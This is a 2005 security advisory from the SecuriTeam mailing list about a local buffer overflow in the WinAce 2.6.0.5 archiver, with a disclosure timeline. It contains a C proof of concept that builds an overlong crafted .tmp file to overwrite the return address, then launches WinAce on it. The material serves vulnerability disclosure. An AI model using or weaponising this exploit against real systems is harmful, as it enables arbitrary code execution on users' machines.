[EXPL] WinAce Temporary File Handling Buffer Overflow

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  WinAce Temporary File Handling Buffer Overflow
------------------------------------------------------------------------


SUMMARY

" <http://www.winace.com/winace.html> WinAce is an archiving utility with 
an easy-to-use interface for creating, extracting, and viewing archives."

Local exploitation of a buffer overflow vulnerability in WinAce allows 
attackers to execute arbitrary code.

DETAILS

Vulnerable Systems:
 * WinAce version 2.6.0.5 (earlier versions suspected)

When WinAce attempts to compress any file, firstly it creates temporary 
file which contains the location of the file which will be compressed. The 
problem specifically exists when parsing temporary files that contain long 
file entries.

An example malicious .tmp file with a long file name:
        c:\AAAAAAAAA...[A x 2021 bytes is where the EIP 
starts]1234[AAAA...AAAAA]\r\n

Command line:
        "C:\Program Files\WinAce\winace.exe" a "C:\Program 
Files\WinAce\winace" @c:\crafted.tmp

'[A x 2021]' represents any string of 2021 bytes in length. Opening either 
malicious tmp file on the Microsoft Windows platform will cause WinAce to 
crash with an access violation when attempting to execute instruction 
0x34333231, which is the little-endian ASCII code representation of 
'1234'. An attacker can exploit this vulnerability to redirect the flow of 
control and eventually execute arbitrary code. This example is specific to 
the Microsoft Windows platform.

Exploitation requires that an attacker to execute arbitrary command line 
which contain location of malicious tmp file.

Disclosure Timeline:
22.07.05 - Initial vendor notification
25.07.05 - Initial vendor response
19.08.05 - Public disclosure

Proof of concept:
/*
*
* WinAce Temporary File Parsing Buffer Overflow Vulnerability
* http://www.winace.com/winace.html
* Discovered & Coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: atmaca@xxxxxxxxxxx
* Credit to kozan
*
*/

/*
*
* Tested with WinAce 2.6.0.5 as installed on the Win XP Sp2 En platform
*
*/

#include <windows.h>
#include <stdio.h>

void main()
{
        // create crafted command line
        char tmpfile[] = "c:\\crafted.tmp";
        char winacepath[] = "\"C:\\Program Files\\WinAce\\winace.exe\"";
        char compresspar[] = " a \"C:\\Program Files\\WinAce\\winace\" @";
        char runpar[300];
        int i = 0;
        char Ret_Addr[]= "\x31\x32\x33\x34";

        strcpy(runpar,winacepath);
        strcat(runpar,compresspar);
        strcat(runpar,tmpfile);

        // create crafted .tmp file
        FILE *di;
        if( (di=fopen(tmpfile,"wb")) == NULL ){
                return;
        }

        fprintf(di,"c:\\");

        for(i=0;i<2013;i++)
                fputc(0x41,di);

        // Overwriting the return address (EIP)
        fprintf(di,Ret_Addr); //EIP

        for(i=0;i<178;i++)
                fputc(0x41,di);

        // end of file
        fprintf(di,"\x2E\x74\x78\x74\x0D\x0A");

        fclose(di);
        WinExec(runpar,SW_SHOW);
}


ADDITIONAL INFORMATION

The information has been provided by  <mailto:atmaca@xxxxxxxxxxx> ATmaCA.
The original article can be found at:  <http://www.atmacasoft.com> 
http://www.atmacasoft.com



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@xxxxxxxxxxxxxx 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@xxxxxxxxxxxxxx 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.